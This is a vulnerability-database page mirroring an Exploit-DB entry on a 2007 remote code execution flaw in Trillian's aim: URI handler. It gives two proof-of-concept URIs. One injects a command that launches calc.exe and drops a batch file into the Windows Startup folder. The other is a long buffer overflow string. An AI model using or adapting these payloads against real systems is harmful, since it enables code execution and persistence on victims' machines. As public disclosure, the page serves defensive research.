Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbNate McfetersEDB-ID:30315
HistoryJul 16, 2007 - 12:00 a.m.

Trillian 3.1.6.0 - URI Handler Remote Code Execution

2007-07-1600:00:00
Nate Mcfeters
www.exploit-db.com
21

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/24927/info

Trillian is prone to remote command- and code-execution vulnerabilities because the application fails to properly handle user-supplied input via a registered URI.

Successfully exploiting these issues allows attackers to execute arbitrary commands or code in the context of the affected application. 

aim:%20&c:/windows/system32/calc.exe%22%20ini=%22C:/Documents%20and%20Settings/All%20Users/Start%20Menu/Programs/Startup/pwnd.bat%22

aim:/#1111111/11111111111111111111111111111111111111111111111111111111111112222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222226666666AAAABBBB6666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666

Related

prion 1
cve 1
nvd 1
cert 1
cvelist 1
nessus 1
prion
prion
Buffer overflow
2007-07-17 22:30:00
cve
cve
CVE-2007-3832
2007-07-17 22:30:00
nvd
nvd
CVE-2007-3832
2007-07-17 22:30:00
cert
cert
Trillian Instant Messenger client fails to properly handle malformed URIs
2007-07-16 00:00:00
cvelist
cvelist
CVE-2007-3832
2007-07-17 22:00:00
nessus
nessus
Trillian aim:// URI Handler Vulnerabilities
2007-07-23 00:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:30315
prion1cve1nvd1cert1cvelist1nessus1